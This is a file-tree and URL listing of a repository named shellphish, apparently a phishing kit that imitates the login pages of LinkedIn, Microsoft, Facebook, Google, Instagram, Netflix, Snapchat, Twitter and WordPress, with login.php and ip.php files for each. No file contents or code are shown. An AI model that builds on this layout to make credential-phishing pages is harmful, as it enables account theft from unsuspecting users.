├── README.md ├── linkedin ├── index.php ├── ip.php ├── login.html └── login.php ├── microsoft ├── index.php ├── index_files │ ├── ConvergedLoginPaginatedStrings.js │ ├── ConvergedLogin_PCore.js │ ├── Converged_v21033.css │ ├── Converged_v21033.css2 │ ├── ellipsis_grey.svg │ ├── ellipsis_white.svg │ ├── prefetch.html │ └── prefetch_data │ │ ├── boot.css │ │ ├── boot.js │ │ ├── boot_002.js │ │ ├── boot_003.js │ │ ├── boot_004.js │ │ ├── sprite1.css │ │ └── sprite1.png └── login.php ├── shellphish.sh ├── sites ├── create │ ├── index.php │ ├── ip.php │ └── login.php ├── facebook │ ├── index.php │ ├── ip.php │ ├── login.html │ ├── login.php │ └── mobile.html ├── google │ ├── index.php │ ├── ip.php │ ├── login.html │ └── login.php ├── instafollowers │ ├── index.php │ ├── ip.php │ ├── login.html │ ├── login.php │ └── login_files │ │ ├── analytics.js │ │ ├── bootstrap.js │ │ ├── css.css │ │ ├── font-awesome.css │ │ ├── jquery.js │ │ ├── jquery_002.js │ │ ├── jquery_003.js │ │ ├── jquery_004.js │ │ ├── jquery_005.js │ │ ├── jquery_006.js │ │ ├── js.js │ │ ├── logo2.png │ │ ├── otherscript.js │ │ ├── scripts.js │ │ ├── smoothscroll.js │ │ ├── styles.css │ │ └── theme-a.css ├── instagram │ ├── index.php │ ├── index_files │ │ ├── 001bc33056c1.jpg │ │ ├── 2d9d7248af43.jpg │ │ ├── 4b70f6fae447.png │ │ ├── 629d23a3c7b2.jpg │ │ ├── 96f2557117a2.js.download │ │ ├── 9e7638226e17.png │ │ ├── aafd8c6b005d.jpg │ │ ├── b67d172d5783.js.download │ │ ├── d1f0f06b39df.js.download │ │ ├── f06b908907d5.png │ │ ├── f55c258e826e.png │ │ ├── f5ae123ab1e2.jpg │ │ ├── f9e5c0ca0804.js.download │ │ ├── fb48443ec9d3.png │ │ ├── lY4eZXm_YWu.html │ │ └── sdk.js.download │ ├── ip.php │ ├── login.html │ └── login.php └── netflix │ ├── Netflix_files │ ├── FB-f-Logo__blue_57.png │ ├── none.css │ ├── none.js │ ├── none_002.js │ ├── sdk.js │ └── xaOI6zd9HW9.html │ ├── index.php │ ├── ip.php │ ├── login.html │ └── login.php ├── snapchat ├── accounts │ └── static │ │ └── scripts │ │ ├── jquery.min.js │ │ ├── main.js │ │ └── semantic.min.js ├── ghost.svg ├── index.php ├── ip.php └── login.php ├── twitter ├── index.php ├── ip.php ├── login.html └── login.php └── wordpress ├── index.php ├── index_files ├── images │ └── wordpress-logo.svg └── load-styles.css ├── ip.php ├── login.html └── login.php /README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/README.md -------------------------------------------------------------------------------- /linkedin/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /linkedin/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/linkedin/ip.php -------------------------------------------------------------------------------- /linkedin/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/linkedin/login.html -------------------------------------------------------------------------------- /linkedin/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/linkedin/login.php -------------------------------------------------------------------------------- /microsoft/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /microsoft/index_files/ConvergedLoginPaginatedStrings.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/microsoft/index_files/ConvergedLoginPaginatedStrings.js -------------------------------------------------------------------------------- /microsoft/index_files/ConvergedLogin_PCore.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/microsoft/index_files/ConvergedLogin_PCore.js -------------------------------------------------------------------------------- /microsoft/index_files/Converged_v21033.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/microsoft/index_files/Converged_v21033.css -------------------------------------------------------------------------------- /microsoft/index_files/Converged_v21033.css2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/microsoft/index_files/Converged_v21033.css2 -------------------------------------------------------------------------------- /microsoft/index_files/ellipsis_grey.svg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/microsoft/index_files/ellipsis_grey.svg -------------------------------------------------------------------------------- /microsoft/index_files/ellipsis_white.svg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/microsoft/index_files/ellipsis_white.svg -------------------------------------------------------------------------------- /microsoft/index_files/prefetch.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/microsoft/index_files/prefetch.html -------------------------------------------------------------------------------- /microsoft/index_files/prefetch_data/boot.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/microsoft/index_files/prefetch_data/boot.css -------------------------------------------------------------------------------- /microsoft/index_files/prefetch_data/boot.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/microsoft/index_files/prefetch_data/boot.js -------------------------------------------------------------------------------- /microsoft/index_files/prefetch_data/boot_002.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/microsoft/index_files/prefetch_data/boot_002.js -------------------------------------------------------------------------------- /microsoft/index_files/prefetch_data/boot_003.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/microsoft/index_files/prefetch_data/boot_003.js -------------------------------------------------------------------------------- /microsoft/index_files/prefetch_data/boot_004.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/microsoft/index_files/prefetch_data/boot_004.js -------------------------------------------------------------------------------- /microsoft/index_files/prefetch_data/sprite1.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/microsoft/index_files/prefetch_data/sprite1.css -------------------------------------------------------------------------------- /microsoft/index_files/prefetch_data/sprite1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/microsoft/index_files/prefetch_data/sprite1.png -------------------------------------------------------------------------------- /microsoft/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/microsoft/login.php -------------------------------------------------------------------------------- /shellphish.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/shellphish.sh -------------------------------------------------------------------------------- /sites/create/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/create/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/create/ip.php -------------------------------------------------------------------------------- /sites/create/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/create/login.php -------------------------------------------------------------------------------- /sites/facebook/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/facebook/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/facebook/ip.php -------------------------------------------------------------------------------- /sites/facebook/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/facebook/login.html -------------------------------------------------------------------------------- /sites/facebook/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/facebook/login.php -------------------------------------------------------------------------------- /sites/facebook/mobile.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/facebook/mobile.html -------------------------------------------------------------------------------- /sites/google/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/google/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/google/ip.php -------------------------------------------------------------------------------- /sites/google/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/google/login.html -------------------------------------------------------------------------------- /sites/google/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/google/login.php -------------------------------------------------------------------------------- /sites/instafollowers/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/instafollowers/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instafollowers/ip.php -------------------------------------------------------------------------------- /sites/instafollowers/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instafollowers/login.html -------------------------------------------------------------------------------- /sites/instafollowers/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instafollowers/login.php -------------------------------------------------------------------------------- /sites/instafollowers/login_files/analytics.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instafollowers/login_files/analytics.js -------------------------------------------------------------------------------- /sites/instafollowers/login_files/bootstrap.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instafollowers/login_files/bootstrap.js -------------------------------------------------------------------------------- /sites/instafollowers/login_files/css.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instafollowers/login_files/css.css -------------------------------------------------------------------------------- /sites/instafollowers/login_files/font-awesome.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instafollowers/login_files/font-awesome.css -------------------------------------------------------------------------------- /sites/instafollowers/login_files/jquery.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instafollowers/login_files/jquery.js -------------------------------------------------------------------------------- /sites/instafollowers/login_files/jquery_002.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instafollowers/login_files/jquery_002.js -------------------------------------------------------------------------------- /sites/instafollowers/login_files/jquery_003.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instafollowers/login_files/jquery_003.js -------------------------------------------------------------------------------- /sites/instafollowers/login_files/jquery_004.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instafollowers/login_files/jquery_004.js -------------------------------------------------------------------------------- /sites/instafollowers/login_files/jquery_005.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instafollowers/login_files/jquery_005.js -------------------------------------------------------------------------------- /sites/instafollowers/login_files/jquery_006.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instafollowers/login_files/jquery_006.js -------------------------------------------------------------------------------- /sites/instafollowers/login_files/js.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instafollowers/login_files/js.js -------------------------------------------------------------------------------- /sites/instafollowers/login_files/logo2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instafollowers/login_files/logo2.png -------------------------------------------------------------------------------- /sites/instafollowers/login_files/otherscript.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instafollowers/login_files/otherscript.js -------------------------------------------------------------------------------- /sites/instafollowers/login_files/scripts.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instafollowers/login_files/scripts.js -------------------------------------------------------------------------------- /sites/instafollowers/login_files/smoothscroll.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instafollowers/login_files/smoothscroll.js -------------------------------------------------------------------------------- /sites/instafollowers/login_files/styles.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instafollowers/login_files/styles.css -------------------------------------------------------------------------------- /sites/instafollowers/login_files/theme-a.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instafollowers/login_files/theme-a.css -------------------------------------------------------------------------------- /sites/instagram/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/instagram/index_files/001bc33056c1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instagram/index_files/001bc33056c1.jpg -------------------------------------------------------------------------------- /sites/instagram/index_files/2d9d7248af43.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instagram/index_files/2d9d7248af43.jpg -------------------------------------------------------------------------------- /sites/instagram/index_files/4b70f6fae447.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instagram/index_files/4b70f6fae447.png -------------------------------------------------------------------------------- /sites/instagram/index_files/629d23a3c7b2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instagram/index_files/629d23a3c7b2.jpg -------------------------------------------------------------------------------- /sites/instagram/index_files/96f2557117a2.js.download: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instagram/index_files/96f2557117a2.js.download -------------------------------------------------------------------------------- /sites/instagram/index_files/9e7638226e17.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instagram/index_files/9e7638226e17.png -------------------------------------------------------------------------------- /sites/instagram/index_files/aafd8c6b005d.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instagram/index_files/aafd8c6b005d.jpg -------------------------------------------------------------------------------- /sites/instagram/index_files/b67d172d5783.js.download: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instagram/index_files/b67d172d5783.js.download -------------------------------------------------------------------------------- /sites/instagram/index_files/d1f0f06b39df.js.download: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instagram/index_files/d1f0f06b39df.js.download -------------------------------------------------------------------------------- /sites/instagram/index_files/f06b908907d5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instagram/index_files/f06b908907d5.png -------------------------------------------------------------------------------- /sites/instagram/index_files/f55c258e826e.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instagram/index_files/f55c258e826e.png -------------------------------------------------------------------------------- /sites/instagram/index_files/f5ae123ab1e2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instagram/index_files/f5ae123ab1e2.jpg -------------------------------------------------------------------------------- /sites/instagram/index_files/f9e5c0ca0804.js.download: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instagram/index_files/f9e5c0ca0804.js.download -------------------------------------------------------------------------------- /sites/instagram/index_files/fb48443ec9d3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instagram/index_files/fb48443ec9d3.png -------------------------------------------------------------------------------- /sites/instagram/index_files/lY4eZXm_YWu.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instagram/index_files/lY4eZXm_YWu.html -------------------------------------------------------------------------------- /sites/instagram/index_files/sdk.js.download: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instagram/index_files/sdk.js.download -------------------------------------------------------------------------------- /sites/instagram/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instagram/ip.php -------------------------------------------------------------------------------- /sites/instagram/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instagram/login.html -------------------------------------------------------------------------------- /sites/instagram/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/instagram/login.php -------------------------------------------------------------------------------- /sites/netflix/Netflix_files/FB-f-Logo__blue_57.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/netflix/Netflix_files/FB-f-Logo__blue_57.png -------------------------------------------------------------------------------- /sites/netflix/Netflix_files/none.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/netflix/Netflix_files/none.css -------------------------------------------------------------------------------- /sites/netflix/Netflix_files/none.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/netflix/Netflix_files/none.js -------------------------------------------------------------------------------- /sites/netflix/Netflix_files/none_002.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/netflix/Netflix_files/none_002.js -------------------------------------------------------------------------------- /sites/netflix/Netflix_files/sdk.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/netflix/Netflix_files/sdk.js -------------------------------------------------------------------------------- /sites/netflix/Netflix_files/xaOI6zd9HW9.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/netflix/Netflix_files/xaOI6zd9HW9.html -------------------------------------------------------------------------------- /sites/netflix/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/netflix/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/netflix/ip.php -------------------------------------------------------------------------------- /sites/netflix/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/netflix/login.html -------------------------------------------------------------------------------- /sites/netflix/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/sites/netflix/login.php -------------------------------------------------------------------------------- /snapchat/accounts/static/scripts/jquery.min.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/snapchat/accounts/static/scripts/jquery.min.js -------------------------------------------------------------------------------- /snapchat/accounts/static/scripts/main.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/snapchat/accounts/static/scripts/main.js -------------------------------------------------------------------------------- /snapchat/accounts/static/scripts/semantic.min.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/snapchat/accounts/static/scripts/semantic.min.js -------------------------------------------------------------------------------- /snapchat/ghost.svg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/snapchat/ghost.svg -------------------------------------------------------------------------------- /snapchat/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /snapchat/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/snapchat/ip.php -------------------------------------------------------------------------------- /snapchat/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/snapchat/login.php -------------------------------------------------------------------------------- /twitter/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /twitter/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/twitter/ip.php -------------------------------------------------------------------------------- /twitter/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/twitter/login.html -------------------------------------------------------------------------------- /twitter/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/twitter/login.php -------------------------------------------------------------------------------- /wordpress/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /wordpress/index_files/images/wordpress-logo.svg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/wordpress/index_files/images/wordpress-logo.svg -------------------------------------------------------------------------------- /wordpress/index_files/load-styles.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/wordpress/index_files/load-styles.css -------------------------------------------------------------------------------- /wordpress/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/wordpress/ip.php -------------------------------------------------------------------------------- /wordpress/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/wordpress/login.html -------------------------------------------------------------------------------- /wordpress/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/shellphish/HEAD/wordpress/login.php --------------------------------------------------------------------------------